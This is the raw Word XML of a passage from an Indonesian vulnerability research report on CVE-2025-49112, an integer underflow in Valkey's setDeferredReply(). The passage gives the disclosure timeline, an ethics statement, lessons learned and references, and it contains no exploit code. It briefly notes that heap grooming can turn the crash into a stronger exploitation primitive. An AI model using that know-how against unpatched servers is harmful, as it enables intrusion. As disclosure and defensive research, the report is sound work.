          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25EB45A2" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/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Analisis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mendalam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menggunakan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Ghidra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verifikasi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perilaku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di level biner.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Dokumentasi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lengkap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teknis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kerentanan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disiapkan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pengungkapan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bertanggung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jawab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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="3EDAA14C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8DDE6"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7652127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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-02-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F21CF5A" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/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Pengiriman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laporan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kerentanan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secara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privat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kepada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tim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keamanan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melalui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saluran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responsible disclosure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ditetapkan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oleh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proyek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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="2D738FBC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0DCF0"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D6B168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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-02-xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="542AC52E" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/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Konfirmasi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penerimaan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laporan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dari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tim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. Proses triage dan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verifikasi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internal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dimulai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oleh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tim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pengembang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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="4D2FBB5A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8DDE6"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="18C5B9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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-xx-xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="484F363C" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/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Penetapan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CVE-2025-49112 oleh CVE Numbering Authority (CNA) dan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penerbitan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GHSA-xhp4-6g9v-4xvj di GitHub Security Advisory Database.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="4174396B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0DCF0"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="40E72A9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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-xx-xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D742000" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/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Patch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tersedia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dan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dirilis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sebagai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bagian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dari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pembaruan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keamanan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Pengguna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disarankan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segera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memperbarui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.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="4EEA54D5" w14:paraId="31731FE6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8DDE6"/>
            <w:tcMar>
              <w:top w:w="90" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="90" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="65F4206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A1628"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2025-04-xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7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30" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F1913AC" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pP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Pengungkapan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publik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melalui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GitHub Security Advisory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setelah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patch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tersedia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Laporan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riset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teknis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ini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dipublikasikan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kepentingan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komunitas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keamanan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1"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="48A21919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6BD18F9B" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A5C" w:sz="6"/>
              <w:left w:val="single" w:color="1A3A5C" w:sz="6"/>
              <w:bottom w:val="single" w:color="D0DCF0" w:sz="2"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFD"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="238601F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907A647" wp14:editId="7777777">
                  <wp:extent cx="8250000" cy="3479167"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="36573849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0000" cy="347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4EEA54D5" w14:paraId="72E080C0" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:left w:val="single" w:color="D0DCF0" w:sz="2"/>
              <w:bottom w:val="single" w:color="1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="D0DCF0" w:sz="2"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDF2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7E617E" wp14:textId="77777777">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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Figure 5: Responsible Disclosure Timeline -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Kronologi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penemuan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,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pelaporan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, dan patch CVE-2025-49112 |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>odaysec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1A3A5C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Research 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0F3CABC7" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="0E6D512B" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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8.2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Pernyataan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Etika dan Responsible Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5B08B5D1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6F502798" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A3C" w:sz="10"/>
              <w:left w:val="single" w:color="1A7A3C" w:sz="10"/>
              <w:bottom w:val="single" w:color="D8DDE6" w:sz="1"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F8ED"/>
            <w:tcMar>
              <w:top w:w="180" w:type="dxa"/>
              <w:left w:w="280" w:type="dxa"/>
              <w:bottom w:w="180" w:type="dxa"/>
              <w:right w:w="280" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidP="4EEA54D5" w14:paraId="3A5C52DA" wp14:textId="6DF3AFF3">
            <w:pPr>
              <w:spacing w:after="100"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1A7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pernyataan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7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Etika </w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1A7A3C"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Peneliti</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D412C48" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="100" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pP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Penelitian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ini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dilakukan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sepenuhnya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sesuai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dengan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prinsip-prinsip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responsible disclosure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ditetapkan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oleh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komunitas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keamanan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siber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internasional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Kerentanan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tidak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pernah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dieksploitasi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pada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sistem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produksi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tanpa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izin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Seluruh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pengujian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dilakukan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di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lingkungan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terisolasi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sepenuhnya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dimiliki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dan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dikontrol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oleh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peneliti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.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EA8078F" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pP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Laporan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dikirimkan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secara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privat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kepada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tim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sebelum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pengungkapan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publik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,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memberikan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waktu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memadai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perbaikan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Informasi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teknis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sensitif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dapat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langsung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digunakan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untuk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serangan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telah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disanitasi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dari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laporan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publik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ini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. Tujuan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satu-satunya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dari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publikasi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ini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adalah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meningkatkan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kesadaran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komunitas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terhadap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pola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kerentanan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integer underflow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="16DEB4AB" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0AD9C6F4" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="39C0FC22" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">BAB IX: KESIMPULAN DAN PEMBELAJARAN</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="4EEA54D5" w14:paraId="2643222A" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="160"/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</w:pP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9.1 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Ringkasan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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Temuan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4FF5EC3F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Kerentanan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CVE-2025-49112 pada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Valkey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adalah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contoh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sangat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baik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dari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kategori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kerentanan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lolos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dari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code review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standar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karena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berkaitan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dengan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perilaku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bahasa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C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terdefinisikan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namun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kontra-intuitif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. Integer underflow pada unsigned integer arithmetic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tidak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menghasilkan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error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kompiler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,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tidak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selalu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terdeteksi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oleh sanitizer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standar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, dan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mengakibatkan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kondisi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keamanan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yang sangat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serius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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4B1F511A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3F196D9D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Enam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poin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pembelajaran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utama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dari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penelitian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ini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1C1C1C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="65F9C3DC" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6C4108EC" wp14:textId="7777777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pengurangan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unsigned integer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dalam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C yang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menghasilkan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nilai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negatif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adalah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sumber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kerentanan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tersembunyi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namun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sangat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berbahaya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,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khususnya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ketika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hasil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digunakan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sebagai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ukuran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buffer.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6CD83A8B" wp14:textId="7777777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Kondisi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if (a - b &gt; 0)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unsigned integer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tidak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setara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dengan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if (a &gt; b).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Keduanya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menghasilkan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hasil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berbeda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ketika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b &gt; a, dan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pemilihan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yang salah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membuka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celah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keamanan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kritis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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="396E746B" wp14:textId="7777777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Analisis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biner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menggunakan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Ghidra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memungkinkan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verifikasi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perilaku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kerentanan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pada level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instruksi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mesin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, yang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penting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membuktikan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bahwa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perbaikan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kode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sumber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benar-benar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menghasilkan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kode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biner yang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aman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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0536B08D" wp14:textId="7777777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Heap grooming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mengubah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kerentanan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awalnya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hanya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DoS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menjadi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primitive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eksploitasi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lebih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powerful,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menunjukkan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pentingnya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analisis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dampak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komprehensif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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54D7B364" wp14:textId="7777777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Artefak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forensik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dari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upaya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eksploitasi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integer underflow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dapat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diidentifikasi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dan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dimonitor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,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memungkinkan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tim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defensif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untuk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mendeteksi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serangan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sebelum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berhasil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.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="723BA3B4" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="150" w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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Pola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kerentanan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serupa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(CWE-191)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kemungkinan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besar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ada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di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komponen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lain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dari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Valkey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dan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proyek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open-source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berbasis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C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lainnya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. Audit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kode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sistematis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dengan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fokus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pada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operasi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 xml:space="preserve"> unsigned arithmetic sangat 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direkomendasikan</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="1C1C1C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5023141B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1F3B1409" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="66967B32" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="440" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">DAFTAR REFERENSI</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1477B1E9" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200" w:line="380" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pP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>Seluruh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>referensi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>dapat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>diakses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>publik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 xml:space="preserve">. URL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>dicantumkan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>sebagai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>tautan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 xml:space="preserve"> yang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>dapat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>diklik</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="562C75D1" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D8DDE6" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="664355AD" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0A55E053" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[1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]  GitHub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 Security Advisory Database. (2025).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GHSA-xhp4-6g9v-4xvj: Integer Underflow in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>Valkey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>setDeferredReply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(). </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Advisory Database. </w:t>
      </w:r>
      <w:hyperlink r:id="R8dee57ad8887463f">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/advisories/GHSA-xhp4-6g9v-4xvj</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6B1B358B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[2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]  National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 Vulnerability Database / NIST. (2025).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CVE-2025-49112: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>Valkey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 Unsigned Integer Underflow in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>networking.c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. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">nvd.nist.gov. </w:t>
      </w:r>
      <w:hyperlink r:id="R4a3daaa9d226452e">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2025-49112</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4D2E6C57" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[3]  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Valkey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 Project. (2025).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>Valkey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 Source Code Repository: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>valkey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>-io/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>valkey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. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub. </w:t>
      </w:r>
      <w:hyperlink r:id="R6be6360e5fda424e">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/valkey-io/valkey</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="54E8605E" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[4]  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odaysec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. (2025).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Vulnerability Discovery: CVE-2025-49112 - Integer Underflow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>setDeferredReply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>Valkey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. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Security Advisory. </w:t>
      </w:r>
      <w:hyperlink r:id="Rfe1c80e07d304ccb">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/advisories/GHSA-xhp4-6g9v-4xvj</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="21604B9A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[5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]  National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 Security Agency (NSA). (2024).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>Ghidra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 Software Reverse Engineering Framework: Official Documentation. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ghidra-sre.org. </w:t>
      </w:r>
      <w:hyperlink r:id="Raeedcdf5b9a24466">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://ghidra-sre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="333240C4" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[6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]  ISO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/IEC. (2018).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ISO/IEC 9899:2018 - Programming Languages: C (C18 Standard). </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">International Organization for Standardization. </w:t>
      </w:r>
      <w:hyperlink r:id="R06f27073ee8e42f9">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.iso.org/standard/74528.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5A160239" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
